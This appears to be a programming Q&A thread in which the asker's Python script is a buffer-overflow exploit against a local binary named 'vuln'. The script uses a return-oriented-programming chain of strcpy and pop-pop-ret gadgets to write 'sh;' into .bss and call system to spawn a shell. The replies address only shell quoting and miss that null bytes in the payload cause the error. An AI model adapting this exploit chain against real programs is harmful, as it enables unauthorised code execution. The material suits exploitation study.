# execute c program with an input using python

Tags: python, c

I am trying to execute a c program with an input string argument on a python script. But I am getting a type error.

p -> is a string variable
vuln -> is a c binary that I can execute fine using the terminal

This is the line that is giving the error:

```
system("/tmp/vuln\""+p+"\"")
```

TypeError: system() argument 1 must be string without null bytes, not str

Thanks

**Update:This is the complete code**

```
#!/usr/bin/python

from struct import pack
from os import system

junk = 'A'*1036 #junk to offset to stored ret
strcpy = pack("<L", 0x0016bf60) #system - 0x10
ppr = pack("<L", 0x080483c2) #pop pop ret

p = junk
p += strcpy
p += ppr
p += pack("<L", 0x0804969c) #bss
p += pack("<L", 0x08048142) # 's'
p += strcpy
p += ppr
p += pack("<L", 0x0804969d) #bss+1
p += pack("<L", 0x080482fa) # 'h'
p += strcpy
p += ppr
p += pack("<L", 0x0804969f) #bss+2
p += pack("<L", 0x080484ff) # ';'
p += pack("<L", 0x0016bf70) #system
p += "AAAA"
p += pack("<L", 0x0804969c) #bss (now contains "sh;<junk>")

system("/tmp/vuln " + p)
```

Comment: Use python's other quoting character `'` and you need a space after `vuln`. Using `format` is cleaner `system('/tmp/vuln "{}"'.format(p))`

Answer (score 0):

You don't need the escaped double-quotes.

```
system("/tmp/vuln " + p) # note the space before the ending quote
```

should work fine.

Please note that if you'd like to read output from `vuln`, or interact with it in any way, you'd be much better off using the [`subprocess`](https://docs.python.org/3/library/subprocess.html) module.

Answer (score 0):

Your input string is all messed up

```
system("/tmp/vuln " + p)
```

The extra backspaces are escape characters, and you do not want those here

Comment: he may need p quoted in order for it to be treated as a single argument to vuln, but you can always use `'` - `'/tmp/vuln "{}"'.format(p)`

Comment: If P is a string, there is no reason for him to do any for formatting.

Comment: The underlying shell may need the quotes, e.g. to create a file called "hello world" would need `touch "hello world"`, so this would mean you need the quotes to system, e.g. `p = "hellow world"; system('touch "{}".format(p))`

Comment: The argument inside system() will be created by concatenating the two strings before the function system it called.

Comment: Try it... `system('touch hello world')` touches two files one called `hello` the other called `world` however, `system('touch "hello world"')` touches a single file called `hello world`.

Comment: There should be no spaces in your file names. I see what you are saying, and you are correct. My Mistake.

Comment: And it isn't just spaces that cause problems, any shell character `$!&'`, etc will cause issues without quoting. But I'm just guessing because we haven't seen what `p` is... so may be talking complete bollox ;)

Comment: Complete code include on the update, thank you very much for the help.

Comment: please mark either answer so the question is marked appropriately.

Comment: Any of the answers have worked on the script, I updated the code so it is easier to find the root of the problem.